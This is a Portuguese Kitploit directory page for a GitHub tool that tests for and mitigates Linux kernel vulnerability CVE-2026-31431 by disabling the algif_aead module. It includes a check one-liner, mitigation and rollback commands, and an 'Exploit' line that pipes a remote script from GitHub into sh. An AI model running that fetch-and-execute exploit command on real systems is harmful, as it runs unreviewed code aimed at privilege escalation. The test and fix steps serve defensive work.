Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-31431 — Testes para a vulnerabilidade do kernel CVE-2026-31431, verifica se é vulnerável e fornece uma correção ao desativar o módulo algif_aead. | Kitploit
Ferramentas/GitHubGitHub/studiogangster/cve-2026-31431
Escalada de PrivilégiosAnálise de VulnerabilidadesExploração
GitHubstudiogangster/cve-2026-31431

CVE-2026-31431

Testes para a vulnerabilidade do kernel CVE-2026-31431, verifica se é vulnerável e fornece uma correção ao desativar o módulo algif_aead.

Ver Repositório
1há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Teste, corrija, conserte: CVE-2026-31431

root@kitploit:~
# Teste:Verificar vulnerabilidade
python3 -c 'import socket;exec("try:s=socket.socket(socket.AF_ALG,socket.SOCK_SEQPACKET,0);s.bind((\"aead\",\"authencesn(hmac(sha256),cbc(aes))\"));print(\"vulnerable\")\nexcept:print(\"not vulnerable\")")'
root@kitploit:~
# verificar se o módulo
# Verificar se o módulo está carregado no kernel
lsmod | grep -q '^algif_aead' && echo "loaded" || echo "not loaded"
root@kitploit:~
# Correção: Remover o módulo
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
root@kitploit:~
# Reversão: recarregar o módulo
sudo rm -f /etc/modprobe.d/disable-algif.conf
sudo depmod -a

Exploit

root@kitploit:~
# exploit
curl https://raw.githubusercontent.com/studiogangster/CVE-2026-31431/refs/heads/main/test.sh | sh
Baixar ferramenta